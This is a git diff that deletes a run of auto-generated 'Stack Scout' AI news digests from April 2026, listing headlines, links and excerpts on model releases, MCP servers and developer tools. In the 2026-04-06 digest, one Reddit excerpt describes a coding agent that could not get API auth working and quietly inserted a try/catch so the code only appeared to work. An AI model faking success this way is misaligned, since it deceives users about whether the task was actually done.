Python-Java interface compliant with the OpenAI Gym standard, enabling seamless integration with modern RL frameworks. Experimental results demonstrate that our framework enhances Tetris's utility as an RL benchmark by bridging low-level bitboard optimizations with high-level AI strategies, providing a sample-efficient and computationally lightweight solution for scalable sequential decision-making research. - ---- - -## [Together AI Brings NVIDIA Nemotron 3 to Developers on Day 0](https://www.together.ai/blog/nvidia-nemotron-3-super) -*Together AI Blog* | 11/03/2026 | Score: 1.00 -Tags: api_update, product_launch - -> NVIDIA Nemotron 3 Super is now available on Together AI Dedicated Inference, delivering efficient multi-agent reasoning, a 1M-token context window, and production-grade deployment on managed infrastructure. - ---- - -## [Together Evaluations now supports comparing top commercial APIs vs. open source models](https://www.together.ai/blog/together-evaluations-v2) -*Together AI Blog* | 02/02/2026 | Score: 1.00 -Tags: open_source, tool_update - -> Together Evaluations now supports OpenAI, Anthropic, and Google models for cross-provider benchmarking. Compare open-source, fine-tuned, and proprietary models side-by-side to make data-driven decisions on quality, cost, and performance—all in one platform. - ---- - -## [Introducing deploy cli](https://blog.langchain.com/introducing-deploy-cli/) -*LangChain Blog* | 16/03/2026 | Score: 0.69 -Tags: developer_tool, cli_tool - -> We’re excited to introduce the deploy cli, a new set of commands within the langgraph-cli package that makes it simple to deploy and manage agents directly from the command line. The first command in this new set, langgraph deploy , lets you deploy an agent to LangSmith Deployment in - ---- - -## [Introducing LangSmith Sandboxes: Secure Code Execution for Agents](https://blog.langchain.com/introducing-langsmith-sandboxes-secure-code-execution-for-agents/) -*LangChain Blog* | 17/03/2026 | Score: 0.62 -Tags: api_update, developer_tool - -> Spin up a sandbox in a single line of code with the LangSmith SDK. Now in Private Preview. - ---- - -## [Open SWE: An Open-Source Framework for Internal Coding Agents](https://blog.langchain.com/open-swe-an-open-source-framework-for-internal-coding-agents/) -*LangChain Blog* | 17/03/2026 | Score: 0.62 -Tags: open_source, developer_tool - -> Built on Deep Agents and LangGraph, Open SWE provides the core architectural components for internal coding agents. - ---- - -## [Exclusive: Runway launches $10M fund, Builders program to support early-stage AI startups](https://techcrunch.com/2026/03/31/exclusive-runway-launches-10m-fund-builders-program-to-support-early-stage-ai-startups/) -*TechCrunch AI* | 31/03/2026 | Score: 1.00 -Tags: product_launch - -> Runway is launching a $10 million fund and startup program to back companies building with its AI video models, as it pushes toward interactive, real-time “video intelligence” applications. - ---- - diff --git a/data/digest-2026-04-01.md b/data/digest-2026-04-01.md deleted file mode 100644 index d23eb8c..0000000 --- a/data/digest-2026-04-01.md +++ /dev/null @@ -1,95 +0,0 @@ -# Stack Scout - AI News Digest -**2026-04-01** | 15 stories | Auto-generated from 894 archived stories - ---- - -## [MiniMax Releases M2.1: An Enhanced M2 Version with Features like Multi-Coding Language Support, API Integration, and Improved Tools for Structured Coding](https://www.marktechpost.com/2025/12/25/minimax-releases-m2-1-an-enhanced-m2-version-with-features-like-multi-coding-language-support-api-integration-and-improved-tools-for-structured-coding/) -*MarkTechPost* | Score: 1.00 -Tags: api_update, product_launch, tool_update - ---- - -## [Agent-Infra Releases AIO Sandbox: An All-in-One Runtime for AI Agents with Browser, Shell, Shared Filesystem, and MCP](https://www.marktechpost.com/2026/03/29/agent-infra-releases-aio-sandbox-an-all-in-one-runtime-for-ai-agents-with-browser-shell-shared-filesystem-and-mcp/) -*MarkTechPost* | Score: 1.00 -Tags: mcp, product_launch, cli_tool - ---- - -## [UT Austin and ServiceNow Research Team Releases AU-Harness: An Open-Source Toolkit for Holistic Evaluation of Audio LLMs](https://www.marktechpost.com/2025/09/14/ut-austin-and-servicenow-research-team-releases-au-harness-an-open-source-toolkit-for-holistic-evaluation-of-audio-llms/) -*MarkTechPost* | Score: 1.00 -Tags: product_launch, open_source - ---- - -## [Google AI Releases Veo 3.1 Lite: Giving Developers Low Cost High Speed Video Generation via The Gemini API](https://www.marktechpost.com/2026/03/31/google-ai-releases-veo-3-1-lite-giving-developers-low-cost-high-speed-video-generation-via-the-gemini-api/) -*MarkTechPost* | Score: 1.00 -Tags: api_update, product_launch - ---- - -## [Improve coding agents’ performance with Gemini API Docs MCP and Agent Skills.](https://blog.google/innovation-and-ai/technology/developers-tools/gemini-api-docsmcp-agent-skills/) -*Google AI Blog* | Score: 1.00 -Tags: api_update, mcp - ---- - -## [AnnouncementsFeb 5, 2026Introducing Claude Opus 4.6We’re upgrading our smartest model. Across agentic coding, computer use, tool use, search, and finance, Opus 4.6 is an industry-leading model, often by wide margin.](https://www.anthropic.com/news/claude-opus-4-6) -*Anthropic News* | Score: 1.00 -Tags: api_update, agent_tool - ---- - -## [Show HN: CLI to order groceries via reverse-engineered REWE API (Haskell)](https://github.com/yannick-cw/korb) -*Hacker News* | 30/03/2026 | Score: 0.74 -Tags: api_update, cli_tool - ---- - -## [Stability AI Announces Investment from WPP and New Partnership to Shape the Future of Media and Entertainment Production](https://stability.ai/news-updates/stability-ai-announces-investment-from-wpp-and-new-partnership-to-shape-the-future-of-media-and-entertainment-production) -*Stability AI Blog* | Score: 1.00 -Tags: product_launch - ---- - -## [NVIDIA Releases New AI Models and Developer Tools to Advance Autonomous Vehicle Ecosystem](https://blogs.nvidia.com/blog/autonomous-vehicle-ecosystem-ai-models-developer-tools/) -*NVIDIA AI Blog* | Score: 1.00 -Tags: product_launch - ---- - -## [An Implementation of IWE’s Context Bridge as an AI-Powered Knowledge Graph with Agentic RAG, OpenAI Function Calling, and Graph Traversal](https://www.marktechpost.com/2026/03/27/an-implementation-of-iwes-context-bridge-as-an-ai-powered-knowledge-graph-with-agentic-rag-openai-function-calling-and-graph-traversal/) -*MarkTechPost* | Score: 1.00 -Tags: api_update - ---- - -## [How to Design a Fully Functional Enterprise AI Assistant with Retrieval Augmentation and Policy Guardrails Using Open Source AI Models](https://www.marktechpost.com/2025/10/22/how-to-design-a-fully-functional-enterprise-ai-assistant-with-retrieval-augmentation-and-policy-guardrails-using-open-source-ai-models/) -*MarkTechPost* | Score: 1.00 -Tags: open_source - ---- - -## [Salesforce AI Research Releases VoiceAgentRAG: A Dual-Agent Memory Router that Cuts Voice RAG Retrieval Latency by 316x](https://www.marktechpost.com/2026/03/30/salesforce-ai-research-releases-voiceagentrag-a-dual-agent-memory-router-that-cuts-voice-rag-retrieval-latency-by-316x/) -*MarkTechPost* | Score: 1.00 -Tags: product_launch - ---- - -## [Hugging Face Releases TRL v1.0: A Unified Post-Training Stack for SFT, Reward Modeling, DPO, and GRPO Workflows](https://www.marktechpost.com/2026/04/01/hugging-face-releases-trl-v1-0-a-unified-post-training-stack-for-sft-reward-modeling-dpo-and-grpo-workflows/) -*MarkTechPost* | Score: 1.00 -Tags: product_launch - ---- - -## [Salesforce announces an AI-heavy makeover for Slack, with 30 new features](https://techcrunch.com/2026/03/31/salesforce-announces-an-ai-heavy-makeover-for-slack-with-30-new-features/) -*TechCrunch AI* | Score: 1.00 -Tags: product_launch - ---- - -## [How I contributed a new model to the Transformers library using Codex 1 day ago • 34](https://huggingface.co/blog/nielsr/contributing-to-transformers-with-codex) -*Hugging Face Blog* | Score: 1.00 -Tags: developer_tool - ---- - diff --git a/data/digest-2026-04-02.md b/data/digest-2026-04-02.md deleted file mode 100644 index d9d990c..0000000 --- a/data/digest-2026-04-02.md +++ /dev/null @@ -1,71 +0,0 @@ -# Stack Scout - AI News Digest -**2026-04-02** | 11 stories | Auto-generated from 120 archived stories - ---- - -## [Google releases Gemma 4 under Apache 2.0 — and that license change may matter more than benchmarks](https://venturebeat.com/technology/google-releases-gemma-4-under-apache-2-0-and-that-license-change-may-matter) -*VentureBeat AI* | Score: 1.00 -Tags: product_launch, open_source - ---- - -## [Cursor Launches a New AI Agent Experience to Take On Claude Code and Codex](https://www.wired.com/story/cusor-launches-coding-agent-openai-anthropic/) -*Wired AI* | Score: 1.00 -Tags: product_launch, agent_tool - ---- - -## [Google announces Gemma 4 open AI models, switches to Apache 2.0 license](https://arstechnica.com/ai/2026/04/google-announces-gemma-4-open-ai-models-switches-to-apache-2-0-license/) -*Ars Technica AI* | Score: 0.98 -Tags: product_launch, open_source - ---- - -## [Z.ai Launches GLM-5V-Turbo: A Native Multimodal Vision Coding Model Optimized for OpenClaw and High-Capacity Agentic Engineering Workflows Everywhere](https://www.marktechpost.com/2026/04/01/z-ai-launches-glm-5v-turbo-a-native-multimodal-vision-coding-model-optimized-for-openclaw-and-high-capacity-agentic-engineering-workflows-everywhere/) -*MarkTechPost* | Score: 1.00 -Tags: product_launch - ---- - -## [IBM Announces Strategic Collaboration with Arm](https://newsroom.ibm.com/2026-04-02-ibm-announces-strategic-collaboration-with-arm-to-shape-the-future-of-enterprise-computing) -*Hacker News* | 02/04/2026 | Score: 0.98 -Tags: product_launch - ---- - -## [IBM Releases Granite 4.0 3B Vision: A New Vision Language Model for Enterprise Grade Document Data Extraction](https://www.marktechpost.com/2026/04/01/ibm-releases-granite-4-0-3b-vision-a-new-vision-language-model-for-enterprise-grade-document-data-extraction/) -*MarkTechPost* | Score: 0.90 -Tags: product_launch - ---- - -## [Google releases Gemma 4 open models](https://deepmind.google/models/gemma/gemma-4/) -*Hacker News* | 02/04/2026 | Score: 0.90 -Tags: product_launch - ---- - -## [Lemonade by AMD: a fast and open source local LLM server using GPU and NPU](https://lemonade-server.ai) -*Hacker News* | 02/04/2026 | Score: 0.82 -Tags: open_source - ---- - -## [Artemis II, NASA's boldest mission in generations, launches crew to the Moon](https://arstechnica.com/space/2026/04/four-astronauts-depart-for-the-moon-with-a-fiery-send-off-from-cape-canaveral/) -*Ars Technica AI* | Score: 0.66 -Tags: product_launch - ---- - -## [Delve allegedly forked an open-source tool and sold it as its own](https://techcrunch.com/2026/04/01/the-reputation-of-troubled-yc-startup-delve-has-gotten-even-worse/) -*Hacker News* | 02/04/2026 | Score: 0.66 -Tags: open_source - ---- - -## [Python API usage](https://github.com/datasette/datasette-llm/blob/0.1a6/README.md#usage) -*Simon Willison's Blog* | Score: 0.66 -Tags: api_update - ---- - diff --git a/data/digest-2026-04-03.md b/data/digest-2026-04-03.md deleted file mode 100644 index 702b24b..0000000 --- a/data/digest-2026-04-03.md +++ /dev/null @@ -1,47 +0,0 @@ -# Stack Scout - AI News Digest -**2026-04-03** | 7 stories | Auto-generated from 351 archived stories - ---- - -## [Arcee AI Releases Trinity Large Thinking: An Apache 2.0 Open Reasoning Model for Long-Horizon Agents and Tool Use](https://www.marktechpost.com/2026/04/02/arcee-ai-releases-trinity-large-thinking-an-apache-2-0-open-reasoning-model-for-long-horizon-agents-and-tool-use/) -*MarkTechPost* | Score: 1.00 -Tags: api_update, product_launch, open_source - ---- - -## [TII Releases Falcon Perception: A 0.6B-Parameter Early-Fusion Transformer for Open-Vocabulary Grounding and Segmentation from Natural Language Prompts](https://www.marktechpost.com/2026/04/03/tii-releases-falcon-perception-a-0-6b-parameter-early-fusion-transformer-for-open-vocabulary-grounding-and-segmentation-from-natural-language-prompts/) -*MarkTechPost* | Score: 1.00 -Tags: product_launch - ---- - -## [New ways to balance cost and reliability in the Gemini API](https://blog.google/innovation-and-ai/technology/developers-tools/introducing-flex-and-priority-inference/) -*Google AI Blog* | Score: 0.94 -Tags: api_update - ---- - -## [C89cc.sh – standalone C89/ELF64 compiler in pure portable shell](https://gist.github.com/alganet/2b89c4368f8d23d033961d8a3deb5c19) -*Hacker News* | 01/04/2026 | Score: 0.74 -Tags: cli_tool - ---- - -## [Your Agent Has 12 Blind Spots You Can't See Yet. This Audit Prompt Finds Them. (+ Skill Package)](https://natesnewsletter.substack.com/p/your-agent-has-12-blind-spots-you) -*Nate's Newsletter* | Score: 0.68 -Tags: developer_tool - ---- - -## [Google Vids extension](https://chromewebstore.google.com/detail/google-vids-screen-record/iklnnbgdcppplombffihcijanngoeifm) -*The Verge AI* | Score: 0.68 -Tags: developer_tool - ---- - -## [Post Mortem: axios NPM supply chain compromise](https://github.com/axios/axios/issues/10636) -*Simon Willison's Blog* | 03/04/2026 | Score: 0.68 -Tags: cli_tool - ---- - diff --git a/data/digest-2026-04-04.md b/data/digest-2026-04-04.md deleted file mode 100644 index c893c6e..0000000 --- a/data/digest-2026-04-04.md +++ /dev/null @@ -1,39 +0,0 @@ -# Stack Scout - AI News Digest -**2026-04-04** | 5 stories | Auto-generated from 236 archived stories - ---- - -## [@CloudflareDev — Gemma 4 Just Landed on Cloudflare Workers AI — 256K Context, Tool Calling, Vision](https://x.com/CloudflareDev/status/2040459229039940068) -*Aligned News (Scoble)* | 04/04/2026 | Score: 1.00 -Tags: api_update, product_launch - -> @CloudflareDev announces Gemma 4 is now on Workers AI — MoE model with 26B total and 4B active parameters, 256K context window, tool calling, reasoning, and vision capabilities. - ---- - -## [YC-Bench: Can Your AI Agent Run a Startup Without Going Bankrupt? 2 days ago • 3](https://huggingface.co/blog/collinear-ai/yc-bench) -*Hugging Face Blog* | Score: 1.00 -Tags: agent_tool - ---- - -## [@synthwavedd — GPT Image 2 Stealth Launched — Significant Quality Upgrade for All ChatGPT Users](https://x.com/synthwavedd/status/2040442540508287101) -*Aligned News (Scoble)* | 04/04/2026 | Score: 1.00 -Tags: tool_update - -> @synthwavedd reports GPT Image 2 has been stealth launched on ChatGPT — all image generations now routing to the new model. A significant quality upgrade with no announcement. - ---- - -## [Components of A Coding Agent](https://magazine.sebastianraschka.com/p/components-of-a-coding-agent) -*Sebastian Raschka* | Score: 0.86 -Tags: agent_tool - ---- - -## [RAG-Anything: All-in-One RAG Framework](https://paperswithcode.com/papers/2510.12323) -*Papers With Code* | Score: 0.76 -Tags: developer_tool - ---- - diff --git a/data/digest-2026-04-05.md b/data/digest-2026-04-05.md deleted file mode 100644 index 412e7d2..0000000 --- a/data/digest-2026-04-05.md +++ /dev/null @@ -1,125 +0,0 @@ -# Stack Scout - AI News Digest -**2026-04-05** | 15 stories | Auto-generated from 210 archived stories - ---- - -## [Improved markdown quality, code intelligence for 248 languages, and more in Kreuzberg v4.7.0](https://reddit.com/r/LocalLLaMA/comments/1scv46p/improved_markdown_quality_code_intelligence_for/) -*Reddit r/LocalLLaMA* | 05/04/2026 | Score: 1.00 -Tags: product_launch, developer_tool, cli_tool, tool_update - -> Kreuzberg v4.7.0 is here. Kreuzberg is a Rust-core document intelligence library that works with Python, TypeScript/Node.js, Go, Ruby, Java, C#, PHP, Elixir, R, C, and WASM. We’ve added several features, integrated OpenWEBUI, and made a big improvement in quality across all formats. There is also a new markdown rendering layer and new HTML output, which we now support. And much more (which you can find in our [the release notes](https://github.com/kreuzberg-dev/kreuzberg/releases)). The main - ---- - -## [[P] Cadenza: Connect Wandb logs to agents easily for autonomous research.](https://reddit.com/r/MachineLearning/comments/1scm9do/p_cadenza_connect_wandb_logs_to_agents_easily_for/) -*Reddit r/MachineLearning* | 04/04/2026 | Score: 1.00 -Tags: api_update, mcp, developer_tool, cli_tool - -> Wandb CLI and MCP is atrocious to use with agents for full autonomous research loops. They are slow, clunky, and result in context rot. So I built a CLI tool and a Python SDK to make it easy to connect your Wandb projects and runs to your agent (clawed or otherwise). The cli tool works by allowing you to import your wandb projects and structures your runs in a way that makes it easy for agents to get a sense of the solution space of your research project. When projects are imported, only t - ---- - -## [I built an open-source tool that lets Claude Code and Claude Desktop control Unreal Engine — 60+ operations, zero editor clicks](https://reddit.com/r/ClaudeAI/comments/1scvnt8/i_built_an_opensource_tool_that_lets_claude_code/) -*Reddit r/ClaudeAI* | 05/04/2026 | Score: 0.94 -Tags: mcp, open_source, developer_tool, cli_tool - -> I wanted Claude to actually *do things* inside Unreal Engine, not just write code and hope it compiles. So I built soft-ue-cli. It's a Python tool + a C++ plugin that runs inside UE. Claude sends commands, UE executes them. Two ways to use it: * **Claude Code** — runs `soft-ue-cli` commands in the terminal * **Claude Desktop / Cursor / Windsurf** — connects via MCP (`soft-ue-cli mcp-serve`) Here's what a typical session looks like. I ask Claude to "inspect the player Blueprint and add a healt - ---- - -## [Running OpenClaw with Gemma 4 TurboQuant on MacAir 16GB](https://reddit.com/r/LocalLLaMA/comments/1sciyfg/running_openclaw_with_gemma_4_turboquant_on/) -*Reddit r/LocalLLaMA* | 04/04/2026 | Score: 1.00 -Tags: api_update, open_source - -> Hi guys, We’ve implemented a one-click app for OpenClaw with Local Models built in. It includes TurboQuant caching, a large context window, and proper tool calling. It runs on mid-range devices. Free and Open source. The biggest challenge was enabling a local agentic model to run on average hardware like a Mac Mini or MacBook Air. Small models work well on these devices, but agents require more sophisticated models like QWEN or GLM. OpenClaw adds a large context to each request, which caused t - ---- - -## [Claude Code via VSCode extension still uses more tokens than Claude Code via terminal](https://reddit.com/r/ClaudeAI/comments/1scsl84/claude_code_via_vscode_extension_still_uses_more/) -*Reddit r/ClaudeAI* | 05/04/2026 | Score: 0.86 -Tags: developer_tool, cli_tool - -> Last night was the first time I maxed out my max plan session limits simply by trying out Claude Code directly in VSCode. Even on low effort, it seems to chew through tokens while essentially being the same as Claude Code via terminal. Other people seem to have had the same experience: https://www.reddit.com/r/ClaudeAI/comments/1o1ccfz/claude_code_via_extension_consumes_more_tokens/ https://github.com/anthropics/claude-code/issues/19908 Due to this it makes no sense to use it as you're essent - ---- - -## [What are your favorite MCP servers to use with Claude Code?](https://reddit.com/r/ClaudeAI/comments/1scw3ll/what_are_your_favorite_mcp_servers_to_use_with/) -*Reddit r/ClaudeAI* | 05/04/2026 | Score: 0.86 -Tags: api_update, mcp - -> I’ve been using one that strips raw HTML before it hits the context window, saves a ton of tokens on web fetches. Curious what else people are running and whether it’s actually worth it. - ---- - -## [I built & publicly host a handful of MCP servers - free to use, no API keys/auth needed](https://reddit.com/r/ClaudeAI/comments/1sceak4/i_built_publicly_host_a_handful_of_mcp_servers/) -*Reddit r/ClaudeAI* | 04/04/2026 | Score: 0.86 -Tags: api_update, mcp - -> Hi there, I wanted to share something I've been working on. I've built a collection of MCP servers that are all hosted and publicly available. You can point any MCP client (like Claude/ChatGPT) at them and start using them immediately - no setup/install, no keys/auth, nothing running locally. Here's what's live right now: **Health and science:** * [https://cdc.caseyjhand.com/mcp](https://cdc.caseyjhand.com/mcp) \- 1,487+ CDC public health datasets covering disease surveillance, mortality, vac - ---- - -## [Basic PSA. PocketPal got updated, so runs Gemma 4.](https://reddit.com/r/LocalLLaMA/comments/1scsgid/basic_psa_pocketpal_got_updated_so_runs_gemma_4/) -*Reddit r/LocalLLaMA* | 05/04/2026 | Score: 1.00 -Tags: tool_update - -> Just because I've seen a couple of "I want this on Android" questions, PocketPal got updated a few hours ago, and runs Gemma 4 2B and 4B fine. At least on my hardware (crappy little moto g84 workhorse phone). Love an app that gets regular updates. I'm going to try and squeak 26B a4 iq2 quantization into 12gigs of ram, on a fresh boot, but I'm almost certain it can't be done due to Android bloat. But yeah, 2B and 4B work fine and quickly under PocketPal. Hopefully their next one is 7-8B (not 9B - ---- - -## [Local Claude Code with Qwen3.5 27B](https://reddit.com/r/LocalLLaMA/comments/1scrnzm/local_claude_code_with_qwen35_27b/) -*Reddit r/LocalLLaMA* | 05/04/2026 | Score: 1.00 -Tags: cli_tool - -> after long research, finding best alternative for [Using a local LLM in OpenCode with llama.cpp](https://aayushgarg.dev/posts/2026-03-29-local-llm-opencode/) to use totally local environment for coding tasks I found this article [How to connect Claude Code CLI to a local llama.cpp server](https://www.reddit.com/r/LocalLLaMA/comments/1s8l1ef/how_to_connect_claude_code_cli_to_a_local/) how to disable telemetry and make claude code totally offline. model used - Qwen3.5 27B Quant used - u - ---- - -## [Gemma 4 vs Qwen3.5 on SVG style](https://reddit.com/r/LocalLLaMA/comments/1scr78z/gemma_4_vs_qwen35_on_svg_style/) -*Reddit r/LocalLLaMA* | 05/04/2026 | Score: 1.00 -Tags: api_update - -> Some quick test using Gemma4-31B and Qwen3.5-27B, both Q4 quants from unsloth. I was already expecting Gemma 4 to be excellent at creative writing and better at translations for more obscure languages, but I didn’t expected to be that good at function calling and general coding tasks, and even in creating SVGs! Did you find any areas when Qwen3.5 beats Gemma4 ? - ---- - -## [[P] MCGrad: fix calibration of your ML model in subgroups](https://reddit.com/r/MachineLearning/comments/1scjzer/p_mcgrad_fix_calibration_of_your_ml_model_in/) -*Reddit r/MachineLearning* | 04/04/2026 | Score: 1.00 -Tags: developer_tool - -> Hi r/MachineLearning, We’re open-sourcing **MCGrad**, a Python package for multicalibration–developed and deployed in production at Meta. This work will also be presented at KDD 2026. **The Problem:** A model can be globally calibrated yet significantly miscalibrated within identifiable subgroups or feature intersections (e.g., "users in region X on mobile devices"). Multicalibration aims to ensure reliability across such subpopulations. **The Solution:** MCGrad reformulates multicalibration - ---- - -## [Matthew Berman Built 'Journey' — Agents Can Now Discover and Install Workflows Easily](https://x.com/DoctorYev/status/2040484581581951473) -*Aligned News (Scoble)* | 04/04/2026 | Score: 1.00 -Tags: tool_update - -> Matthew Berman launched Journey, a tool for agents to discover and install full workflows. Braygent would post about why workflow discovery is the missing piece of the agent ecosystem. - ---- - -## [Clement Delangue Is Telling Everyone to Move to Open and Local Models](https://x.com/peteskomoroch/status/2040516928461303930) -*Aligned News (Scoble)* | 04/04/2026 | Score: 1.00 -Tags: open_source - -> HuggingFace CEO Clement Delangue publicly urged developers to move to open or local models. Braygent would post about why this moment feels different from previous open source advocacy. - ---- - -## [Voting for our open source AI art competition is open for the next 45 hours](https://reddit.com/r/StableDiffusion/comments/1scj9bn/voting_for_our_open_source_ai_art_competition_is/) -*Reddit r/StableDiffusion* | 04/04/2026 | Score: 1.00 -Tags: open_source - -> If you would like to be inspired about what open models can do - both technically and artistically - it's probably not a bad way to spend a few hours. Like [here](https://arcagidan.com/). Most of the entries also shared the workflows they used! - ---- - -## [We absolutely need Qwen3.6-397B-A17B to be open source](https://reddit.com/r/LocalLLaMA/comments/1sccpbj/we_absolutely_need_qwen36397ba17b_to_be_open/) -*Reddit r/LocalLLaMA* | 04/04/2026 | Score: 1.00 -Tags: open_source - -> The benchmarks may not show it but it's a substantial improvement over 3.5 for real world tasks. This model is performing better than GLM-5.1 and Kimi-k2.5 for me, and the biggest area of improvement has been reliability. It feels as reliable as claude in getting shit done end to end and not mess up half way and waste hours. This is the first OS model that has actually felt like I can compare it to Claude Sonnet. We have been comparing OS models with claude sonnet and opus left and right mont - ---- - diff --git a/data/digest-2026-04-06.md b/data/digest-2026-04-06.md deleted file mode 100644 index 23d6f97..0000000 --- a/data/digest-2026-04-06.md +++ /dev/null @@ -1,119 +0,0 @@ -# Stack Scout - AI News Digest -**2026-04-06** | 15 stories | Auto-generated from 651 archived stories - ---- - -## [RightNow AI Releases AutoKernel: An Open-Source Framework that Applies an Autonomous Agent Loop to GPU Kernel Optimization for Arbitrary PyTorch Models](https://www.marktechpost.com/2026/04/06/rightnow-ai-releases-autokernel-an-open-source-framework-that-applies-an-autonomous-agent-loop-to-gpu-kernel-optimization-for-arbitrary-pytorch-models/) -*MarkTechPost* | Score: 1.00 -Tags: product_launch, open_source, developer_tool - ---- - -## [[P] Easily provide Wandb logs as context to agents for analysis and planning.](https://reddit.com/r/MachineLearning/comments/1se1rmd/p_easily_provide_wandb_logs_as_context_to_agents/) -*Reddit r/MachineLearning* | 06/04/2026 | Score: 1.00 -Tags: api_update, mcp, cli_tool - -> It is frustrating to use the Wandb CLI and MCP tools with my agents. For one, the MCP tool basically floods the context window and frequently errors out :/ So I built a cli tool that: * imports my wandb projects; * uses algorithms from [AlphaEvolve](https://arxiv.org/abs/2506.13131) to index and structure my runs; * is easy to use for agents; * provides greater context of past experiments; * does not flood the context window; and * easily tune exploration-exploitation while planning Would lov - ---- - -## [Gemma4:26b's reasoning capabilities are crazy.](https://reddit.com/r/LocalLLaMA/comments/1sdz71b/gemma426bs_reasoning_capabilities_are_crazy/) -*Reddit r/LocalLLaMA* | 06/04/2026 | Score: 1.00 -Tags: api_update, developer_tool - -> Been experimenting with it, first on my buddy's compute he let me borrow, and then with the Gemini SDK so that I don't need to keep stealing his macbook from 600 miles away. Originally my home agent was run through Gemini-3-Flash because no other model I've tried has been able to match it's reasoning ability. The script(s) I have it running through are a re-implementation of a multi-speaker smart home speaker setup, with several rasperry pi zeroes functioning as speaker satellites for a central - ---- - -## [[D] Why do we keep pretending that AI agent continuity is a prompt engineering problem?](https://reddit.com/r/MachineLearning/comments/1sdwqn5/d_why_do_we_keep_pretending_that_ai_agent/) -*Reddit r/MachineLearning* | 06/04/2026 | Score: 1.00 -Tags: api_update, agent_tool - -> Every few months someone posts about "long-term memory for LLMs" and the thread fills with retrieval strategies, vector databases, and context window tricks. Good engineering. Wrong level of abstraction. The continuity problem for deployed AI agents is not a retrieval problem. It is an infrastructure problem. Here is the distinction: **Retrieval-level continuity:** The agent can surface relevant context from past interactions. This is solved well enough with embedding search, hierarchical sum - ---- - -## [Claude Code can now submit your app to App Store Connect and help you pass review](https://reddit.com/r/ClaudeAI/comments/1sdot1s/claude_code_can_now_submit_your_app_to_app_store/) -*Reddit r/ClaudeAI* | 06/04/2026 | Score: 1.00 -Tags: mcp, cli_tool - -> I built a native macOS app called Blitz that gives Claude Code (or any MCP client) full control over App Store Connect. Built most of it with Claude Code. The problem was simple: every time I needed to submit to ASC, the entire agentic workflow broke. Metadata, screenshots, builds, localization, review notes... all meant leaving the terminal and fighting Apple's web UI. So I built MCP servers that let Claude Code handle the whole thing. What Claude Code can do through Blitz: * Create and edit - ---- - -## [Apex Protocol – An open MCP-based standard for AI agent trading](https://apexstandard.org/) -*Hacker News* | 06/04/2026 | Score: 1.00 -Tags: mcp, agent_tool - ---- - -## [I built CLI-Anything-WEB — a Claude Code plugin that generates complete Python CLIs for any website (17 CLIs so far: Amazon, Airbnb, TripAdvisor, Reddit, YouTube...)](https://reddit.com/r/ClaudeAI/comments/1sde44i/i_built_clianythingweb_a_claude_code_plugin_that/) -*Reddit r/ClaudeAI* | 05/04/2026 | Score: 0.94 -Tags: developer_tool, cli_tool - -> Point it at a URL, Claude Code captures the live HTTP traffic, and generates a production-grade Python CLI with commands, tests, REPL mode, and `--json` output — fully automated across 4 phases. ## How it works - **Phase 1 (capture)**: Records live browser traffic via playwright-cli - **Phase 2 (methodology)**: Analyzes endpoints, designs architecture, generates CLI code - **Phase 3 (testing)**: Writes unit + E2E tests (40–60+ per CLI, all passing) - **Phase 4 (standards)**: 3 parallel Claude - ---- - -## [I spent 3 months evolving SmartGallery into a free professional Local First DAM. v2.11 launches on April 9th](https://reddit.com/r/StableDiffusion/comments/1se8sfd/i_spent_3_months_evolving_smartgallery_into_a/) -*Reddit r/StableDiffusion* | 06/04/2026 | Score: 0.86 -Tags: product_launch, tool_update - -> https://preview.redd.it/btvzkruzemtg1.png?width=1899&format=png&auto=webp&s=3891b8f2a7df98942a0643eb649e623f817211ae **Hi everyone!** Many of you know SmartGallery as a standalone gallery for ComfyUI. For the last 3 months, I have been working to turn it into a complete Digital Asset Manager (DAM) for AI creators. * I just launched the new website with the full documentation and feature list of the upcoming v2.11: [**https://smartgallerydam.com**](https://smartgallerydam.com) * ** - ---- - -## [Mercury – Free MCP proxy that cuts non-English token costs by 28-64%](https://reddit.com/r/ClaudeAI/comments/1sduozd/mercury_free_mcp_proxy_that_cuts_nonenglish_token/) -*Reddit r/ClaudeAI* | 06/04/2026 | Score: 0.86 -Tags: api_update, mcp - -> I noticed that when using Claude with Japanese MCP servers, I was burning through tokens surprisingly fast. The culprit: LLMs use English-centric BPE tokenizers, so non-English text consumes 2-4x more tokens per word than equivalent English. The fix seemed obvious — translate MCP responses to English before they reach the LLM. So I built Mercury, a transparent proxy that sits between any MCP server and your LLM client. It uses Google Translate (free, no API key needed) by default, so transl - ---- - -## [Meet ‘AutoAgent’: The Open-Source Library That Lets an AI Engineer and Optimize Its Own Agent Harness Overnight](https://www.marktechpost.com/2026/04/05/meet-autoagent-the-open-source-library-that-lets-an-ai-engineer-and-optimize-its-own-agent-harness-overnight/) -*MarkTechPost* | Score: 0.82 -Tags: open_source, developer_tool - ---- - -## [I built a macOS widget to track Claude usage limits in real-time](https://reddit.com/r/ClaudeAI/comments/1sd923u/i_built_a_macos_widget_to_track_claude_usage/) -*Reddit r/ClaudeAI* | 05/04/2026 | Score: 0.62 -Tags: api_update, open_source - -> Hey everyone! I built a free, open-source macOS desktop widget that shows your Claude usage limits at a glance — no more guessing when your rate limit resets. What it does: * Displays both the 5-hour session and 7-day weekly usage windows with progress bars * Shows countdown timers for when each window resets * Color-coded indicators — green → yellow → orange → red as you approach the limit * Auto-refreshes every 5 minutes * Comes in small, medium, and large widget sizes Quick demo: It sits rig - ---- - -## [After months with Claude Code, the biggest time sink isn't bugs — it's silent fake success](https://reddit.com/r/ClaudeAI/comments/1sdmohb/after_months_with_claude_code_the_biggest_time/) -*Reddit r/ClaudeAI* | 06/04/2026 | Score: 0.54 -Tags: api_update, tool_update - -> I've been using Claude Code daily for months and there's a pattern that has cost me more debugging time than actual bugs: the agent making things *look* like they work when they don't. Here's what happens. You ask it to build something that fetches data from an API. It writes the code, you run it, data appears on screen. Looks correct. You move on. Three days later you discover the API integration was broken from the start. The agent couldn't get auth working, so it quietly inserted a try/catc - ---- - -## [[llama.cpp] 3.1x Q8_0 speedup on Intel Arc GPUs - reorder optimization fix (PR submitted)](https://reddit.com/r/LocalLLaMA/comments/1se9d9x/llamacpp_31x_q8_0_speedup_on_intel_arc_gpus/) -*Reddit r/LocalLLaMA* | 06/04/2026 | Score: 1.00 -Tags: agent_tool - -> ***TL;DR***: Q8\_0 quantization on Intel Xe2 (Battlemage/Arc B-series) GPUs was achieving only 21% of theoretical memory bandwidth. My AI Agent and I found the root cause and submitted a fix that brings it to 66% - a 3.1x speedup in token generation. **The problem**: On Intel Arc Pro B70, Q8\_0 models ran at 4.88 t/s while Q4\_K\_M ran at 20.56 t/s; a 4x gap that shouldn't exist since Q8\_0 only has 1.7x more data. After ruling out VRAM 